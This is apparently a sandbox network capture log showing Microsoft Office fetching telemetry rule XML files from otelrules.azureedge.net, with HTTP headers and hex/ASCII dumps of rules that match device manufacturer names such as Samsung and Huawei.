                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    39192.168.2.54976213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:25 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 499
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                    x-ms-request-id: 6eb87161-001e-0079-37d9-2612e8000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120825Z-17c5cb586f6vcw6vtg5eymp4u800000004q0000000002f9p
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    40192.168.2.54976413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:25 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                    x-ms-request-id: deaa19c2-701e-006f-33de-26afc4000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120825Z-17c5cb586f6gkqkwd0x1ge8t0400000006v00000000090a0
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    41192.168.2.54976513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:25 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                    x-ms-request-id: 2760be74-301e-0096-200b-26e71d000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120825Z-16849878b78j7llf5vkyvvcehs00000007fg00000000g5de
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    42192.168.2.54976313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:25 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                    x-ms-request-id: 50755ed9-801e-00ac-015e-27fd65000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120825Z-17c5cb586f6f8m6jnehy0z65x400000005w00000000010g6
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    43192.168.2.54976613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:25 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                    x-ms-request-id: fa11464d-701e-0032-1f49-27a540000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120825Z-16849878b78p8hrf1se7fucxk8000000078g00000000g1m5
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:25 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    44192.168.2.54976913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:26 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                    x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120826Z-15b8d89586fst84k5f3z220tec0000000qk00000000058r0
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    45192.168.2.54976813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:26 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 420
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                    x-ms-request-id: 892d3b27-201e-005d-7649-27afb3000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120826Z-16849878b78wc6ln1zsrz6q9w8000000065000000000a47k
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    46192.168.2.54977013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:26 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                    x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120826Z-16849878b7898p5f6vryaqvp5800000007d0000000003hp4
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    47192.168.2.54977113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:26 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                    x-ms-request-id: 03f0a5af-d01e-007a-76f2-24f38c000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120826Z-r197bdfb6b42rt68rzg9338g1g00000007r00000000060r4
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
